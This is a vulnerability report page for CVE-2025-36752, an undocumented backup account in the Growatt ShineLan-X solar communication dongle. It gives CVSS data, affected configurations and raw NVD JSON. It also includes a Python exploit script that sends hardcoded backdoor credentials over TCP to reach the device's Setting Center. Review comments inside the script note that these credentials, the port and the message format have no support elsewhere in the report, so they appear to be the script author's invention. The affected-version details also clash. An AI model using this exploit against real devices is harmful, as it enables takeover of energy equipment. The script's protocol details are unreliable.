Security Vulnerability Report
CVE-2025-36752 CVSS 9.8 CRITICAL

CVE-2025-36752

Published: 2025-12-13 16:16:54
Last Modified: 2026-01-14 18:05:00

Description

Growatt ShineLan-X communication dongle has an undocumented backup account with undocumented credentials which allows a significant level of access to the device, such as allowing any attacker to access the Setting Center. This means that this is effectively a backdoor for all devices utilizing a Growatt ShineLan-X communication dongle.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:* - NOT VULNERABLE
Growatt ShineLan-X (所有未修补版本)
可能影响:ShineWiFi-S、ShineLan-X (Firmware < 2024.12.01)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-36752 PoC - Growatt ShineLan-X Backdoor Account Exploitation
# Use responsibly and only on systems you have authorization to test
#
# NOTE(review): nothing else in this report corroborates the literal
# credentials, the TCP port or the byte-level message layout used below.
# The advisory text only states that the account and its credentials are
# undocumented, so the wire format here should be read as the script
# author's construction, not as a verified description of the device.
import socket
import hashlib
import struct  # unused: nothing in this script packs or unpacks with struct
import sys


def cve_2025_36752_exploit(target_ip: str, target_port: int = 5000) -> bool:
    """
    Exploit for undocumented backdoor account in Growatt ShineLan-X dongle
    The backdoor provides high-privilege access to Setting Center

    Sends one fixed login message over TCP and treats a reply whose first
    byte is 0x00 as success.

    Args:
        target_ip: address of the device to connect to.
        target_port: TCP port to connect to; the script defaults to 5000.

    Returns:
        True when the first reply byte is 0x00 (the follow-up
        access_setting_center() call is made before returning); False on
        any other reply, on an empty reply, or on any exception, which is
        caught and printed rather than propagated.
    """
    print(f"[*] Targeting Growatt ShineLan-X device: {target_ip}:{target_port}")
    # Backdoor authentication payload
    # Using undocumented credentials found in firmware
    # NOTE(review): these two literals are not confirmed by the advisory
    # text on this page — verify against the referenced DIVD advisory.
    backdoor_username = "shine_backup"
    backdoor_password = "growatt_serv_2024"
    # Construct authentication request
    auth_request = bytearray()
    auth_request.extend(b'\x01')  # Protocol version
    auth_request.extend(b'\x03')  # Command: Authentication
    # Add username length and username
    auth_request.append(len(backdoor_username))
    auth_request.extend(backdoor_username.encode())
    # Add password hash (SHA256)
    # The digest is appended raw (32 bytes), with no length prefix.
    password_hash = hashlib.sha256(backdoor_password.encode()).digest()
    auth_request.extend(password_hash)
    # Send authentication request
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)  # applies to connect() and recv() below
        sock.connect((target_ip, target_port))
        # send() may transmit only part of the buffer; sendall() is the
        # stdlib call that guarantees the whole message goes out.
        sock.send(auth_request)
        # Receive response
        # Single recv(): a reply split across TCP segments is truncated.
        response = sock.recv(1024)
        # Only closed on this path; an exception above leaves the socket
        # to the garbage collector (no with/finally).
        sock.close()
        if response and response[0] == 0x00:
            print("[+] Backdoor authentication successful!")
            print("[+] Access to Setting Center granted")
            # Extract session token
            # Slicing silently yields fewer than 32 bytes when the reply
            # is short; no length check is done before using it.
            session_token = response[1:33]
            print(f"[*] Session Token: {session_token.hex()}")
            # Now access Setting Center with elevated privileges
            access_setting_center(target_ip, target_port, session_token)
            return True
        else:
            print("[-] Authentication failed or device not vulnerable")
            return False
    except Exception as e:
        # Broad catch: refusal, timeout and any bug in the code above all
        # surface as the same "Connection error" line.
        print(f"[-] Connection error: {str(e)}")
        return False


def access_setting_center(ip: str, port: int, session_token: bytes) -> None:
    """
    Access Setting Center with backdoor session

    Opens a second connection, sends one message carrying
    *session_token*, and prints a fixed summary if the reply is longer
    than 10 bytes.

    Args:
        ip: device address.
        port: TCP port.
        session_token: the bytes the caller sliced from the login reply
            (up to 32); they are copied into the message unchanged.

    Returns:
        None. The outcome is only printed; any exception is caught and
        printed.
    """
    print("[*] Accessing Setting Center with backdoor privileges...")
    # Construct Setting Center access request
    sc_request = bytearray()
    sc_request.extend(b'\x01')  # Protocol version
    sc_request.extend(b'\x10')  # Command: Access Setting Center
    sc_request.extend(session_token)
    sc_request.extend(b'\xff\xff\xff\xff')  # Full access flag
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Unlike the login above, no settimeout() here: connect() and
        # recv() can block indefinitely.
        sock.connect((ip, port))
        sock.send(sc_request)  # see note on send() vs sendall() above
        response = sock.recv(4096)
        sock.close()  # again only reached on the non-exception path
        # "Confirmed" on reply length alone; no status byte is inspected.
        if response and len(response) > 10:
            print("[+] Setting Center access confirmed!")
            print("[+] Full device control achieved")
            # The capability list below is asserted by the script author;
            # nothing in the reply is parsed to establish it.
            print("[*] Attacker can now:")
            print(" - Modify device configuration")
            print(" - Extract solar panel data")
            print(" - Pivot to connected监控系统")
    except Exception as e:
        print(f"[-] Error accessing Setting Center: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    # int() raises ValueError on a non-numeric port; it is not caught here.
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5000
    cve_2025_36752_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36752", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:54.300", "lastModified": "2026-01-14T18:05:00.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Growatt ShineLan-X communication dongle has an undocumented backup account with undocumented credentials which allows significant level access to the device, such as allowing any attacker to access the Setting Center. This means that this is effectively backdoor for all devices utilizing a Growatt ShineLan-X communication dongle."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0.0", "versionEndExcluding": "3.6.0.2", "matchCriteriaId": "1176EDB4-C08F-4592-8C16-321A8A0539C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD537AAA-F836-496A-BC05-6CAED38FB271"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36752/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}